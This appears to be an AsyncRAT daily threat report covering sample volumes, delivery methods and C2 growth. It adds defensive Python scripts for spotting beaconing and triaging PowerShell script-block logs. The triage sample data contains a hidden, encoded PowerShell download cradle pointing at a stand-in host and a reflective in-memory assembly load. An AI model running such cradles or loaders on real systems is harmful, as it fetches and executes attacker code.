AsyncRAT - Daily Threat Report

Friday, May 1, 2026

Daily Summary

AsyncRAT activity surged sharply on 2026-05-01, with 53 new samples detected against a 7-day average of 25, a 112% increase (53 / 25 = 2.12). This is the largest single-day volume in the observed period and may indicate the launch of a new campaign or an automated distribution wave.

New Samples Detected

Executables (.exe) dominate at 33 samples (62%), consistent with typical AsyncRAT delivery. PowerShell scripts (.ps1) account for 9 samples, suggesting continued use of living-off-the-land techniques. The presence of 2 .js files and 1 .dll suggests modular delivery chains in which a script-based dropper fetches or decodes the core payload and loads it, possibly reflectively in memory rather than from a file on disk. The 2 .zip and 1 .rar archives point to staged delivery, where the RAT or its loader is bundled inside a compressed file so that mail and download filters that block bare executables do not see it.

Distribution Methods

Delivery appears multi-vector. The prevalence of .ps1 scripts alongside executable files suggests phishing campaigns that use malicious email attachments, or links that lead to script downloads. The 5 .bat files indicate batch scripting as an initial loader, often disguised as a system update or software patch. The archive files (.zip, .rar) imply social engineering through fake invoices, order confirmations, or shipping notifications that lure users into extracting and running the payload. Together the file types account for all 53 samples (33 + 9 + 5 + 2 + 2 + 1 + 1).

Detection Rate

Detection coverage for today's samples is likely uneven across antivirus engines. Signature-based engines tend to catch the compiled .exe payloads, since the AsyncRAT core is a well-known codebase, but script-based loaders (PowerShell, JS, batch) can be heavily obfuscated and regenerated per campaign, so their detection rates are typically lower. If a loader decodes and loads the core payload directly in memory, as the combination of script droppers and a .dll sample suggests, disk-based scanning never sees the final RAT. SOC teams should therefore rely on behavioral detection: process injection (a script host writing into or spawning another process) and outbound C2 beaconing (periodic connections from one host to the same external address).
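As an added example (not part of the original report), the following script shows the beaconing half of that behavioral detection over constructed outbound connection records. It groups connections by (host, destination), measures the spacing between successive connections, and flags destinations contacted at near-constant intervals, the pattern a RAT's check-in loop produces regardless of how the payload was loaded. The log lines, hostnames and addresses (documentation ranges 203.0.113.0/24 and 198.51.100.0/24) are constructed; port 6606 is one of the ports in AsyncRAT's stock build configuration, though real campaigns change it, and the detector does not depend on it. The thresholds are assumptions to be tuned for the environment.

```python
"""Flag candidate C2 beacons in outbound connection logs (added example)."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample records: "timestamp host dst_ip:port bytes_out".
# WS-17 -> 203.0.113.45:6606 every ~30 s (a check-in loop);
# WS-17 -> 198.51.100.7:443 at irregular intervals (ordinary web traffic);
# WS-22 -> 198.51.100.7:443 only twice (too little to judge).
SAMPLE_LOG = """\
2026-05-01T08:00:00 WS-17 203.0.113.45:6606 412
2026-05-01T08:00:30 WS-17 203.0.113.45:6606 398
2026-05-01T08:01:01 WS-17 203.0.113.45:6606 405
2026-05-01T08:01:30 WS-17 203.0.113.45:6606 410
2026-05-01T08:02:00 WS-17 203.0.113.45:6606 402
2026-05-01T08:02:31 WS-17 203.0.113.45:6606 399
2026-05-01T08:00:12 WS-17 198.51.100.7:443 15320
2026-05-01T08:00:41 WS-17 198.51.100.7:443 2211
2026-05-01T08:03:55 WS-17 198.51.100.7:443 83012
2026-05-01T08:09:02 WS-17 198.51.100.7:443 6600
2026-05-01T08:09:30 WS-17 198.51.100.7:443 1900
2026-05-01T08:00:05 WS-22 198.51.100.7:443 1200
2026-05-01T08:00:09 WS-22 198.51.100.7:443 980
"""


def parse(log: str):
    """Group (timestamp, bytes) records by (host, destination)."""
    events = defaultdict(list)
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, host, dst, nbytes = line.split()
        events[(host, dst)].append((datetime.fromisoformat(ts), int(nbytes)))
    return events


def beacon_score(times):
    """Return (mean gap in seconds, coefficient of variation) for sorted datetimes.

    A low coefficient of variation means the gaps are nearly equal, i.e.
    the connections are periodic.  Real implants add jitter, so the
    threshold is a tuning knob rather than a hard rule.
    """
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    m = mean(gaps)
    return m, (pstdev(gaps) / m if m else float("inf"))


def find_beacons(log: str, min_conns: int = 5, max_cv: float = 0.15):
    """Return [(host, dst, mean_gap, cv)] for series that look periodic."""
    hits = []
    for (host, dst), recs in parse(log).items():
        if len(recs) < min_conns:
            continue  # too few connections to assess periodicity
        times = sorted(t for t, _ in recs)
        m, cv = beacon_score(times)
        if cv <= max_cv:
            hits.append((host, dst, round(m, 1), round(cv, 3)))
    return hits


if __name__ == "__main__":
    for host, dst, gap, cv in find_beacons(SAMPLE_LOG):
        print(f"{host} -> {dst}: every {gap}s (cv={cv})")
```

Run against real proxy or NetFlow exports, the same grouping works on (source, destination, port); the interesting cases are long-lived series with a low coefficient of variation and small, similar payload sizes, which is why the byte count is parsed even though the example does not yet score it.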

C2 Infrastructure

Today saw 100 new C2 servers recorded and 153 new IOCs, a substantial expansion of the command-and-control network. The high volume of new servers suggests rapid rotation or a fresh infrastructure pool, likely hosted on cheap VPS or cloud platforms to hinder takedown efforts. No geographic pattern is discernible from the data provided, but the volume points to diversified hosting.

7-Day Trend

Today’s volume of 53 samples is more than double the 7-day average of 25, representing a clear upward break from prior days. If this pace continues, AsyncRAT activity may signal a sustained campaign rather than a one-day anomaly.

Security Analysis

The sharp increase in .ps1 and .bat scripts alongside the large spike in new C2 servers points to a coordinated seeding operation. This mirrors tactics seen in recent AsyncRAT campaigns that use GitHub or Pastebin to host scripted loaders, which then download the main executable. The single .dll sample is also worth noting: a DLL-form payload can be run without a standalone executable, either by sideloading next to a trusted program or through a signed host such as regsvr32, both of which blend into normal process trees. Actionable recommendation: enable PowerShell script block logging (Microsoft-Windows-PowerShell/Operational, Event ID 4104) so the content of every executed block, including the decoded form of encoded or obfuscated commands, is recorded; keep AMSI-integrated antivirus active so that content is scanned at execution time; and block script execution from user-writable locations with AppLocker or WDAC.
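To show what script block logging buys a SOC once it is enabled, here is an added example, not from the original report, that triages a few constructed records shaped like the ScriptBlockText field of Event ID 4104. It scores the loader patterns the report describes (encoded commands, download cradles, in-memory assembly loading) and decodes any -EncodedCommand argument to pull out the URL it hides. The records, hostnames, the example.invalid URL, the indicator list and the weights are all constructed assumptions for illustration.

```python
"""Triage PowerShell script block (Event ID 4104) records (added example)."""
import base64
import re


def _encode_command(ps: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")


# Constructed records: one benign admin command, one encoded download
# cradle of the kind a .ps1/.bat loader runs, one in-memory assembly load.
LOADER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/ld.ps1')"
SAMPLE_4104 = [
    {"host": "WS-05", "ScriptBlockText": "Get-ChildItem C:\\Users -Recurse -Filter *.log"},
    {"host": "WS-17", "ScriptBlockText":
        "powershell -nop -w hidden -EncodedCommand " + _encode_command(LOADER)},
    {"host": "WS-22", "ScriptBlockText":
        "$b=[Convert]::FromBase64String($p);"
        "[Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)"},
]

# (pattern, weight, label) - weights are an assumed starting point.
ENCODED = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
INDICATORS = [
    (ENCODED, 3, "encoded command"),
    (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2, "Invoke-Expression"),
    (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I), 2, "download cradle"),
    (re.compile(r"Reflection\.Assembly\]::Load", re.I), 3, "in-memory assembly load"),
    (re.compile(r"FromBase64String", re.I), 1, "base64 decode"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b", re.I), 1, "hidden/noprofile switches"),
]
URL = re.compile(r"https?://[^\s'\"()]+")


def decode_encoded_command(text: str) -> str:
    """Return the decoded -EncodedCommand payload, or '' if none is present."""
    m = ENCODED.search(text)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def triage(record: dict) -> dict:
    """Score one 4104 record; indicators are checked on raw and decoded text."""
    text = record["ScriptBlockText"]
    decoded = decode_encoded_command(text)
    visible = text + "\n" + decoded
    score, tags = 0, []
    for rx, weight, tag in INDICATORS:
        if rx.search(visible):
            score += weight
            tags.append(tag)
    return {"host": record["host"], "score": score, "tags": tags,
            "decoded": decoded, "urls": URL.findall(visible)}


def flagged(records, threshold: int = 4):
    """Return the triaged records whose score reaches the threshold."""
    return [r for r in (triage(x) for x in records) if r["score"] >= threshold]


if __name__ == "__main__":
    for hit in flagged(SAMPLE_4104):
        print(hit["host"], hit["score"], hit["tags"], hit["urls"])
```

The extracted URLs are the first thing to pivot on: compare them against the day's URLhaus and ThreatFox indicators, and block the host if it is not already covered. Without script block logging only the opaque base64 blob reaches the SOC; with it, the decoded cradle and its URL are in the event itself.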

Further Reading

Data Sources

MalwareBazaar (abuse.ch)
ThreatFox (abuse.ch)
URLhaus (abuse.ch)
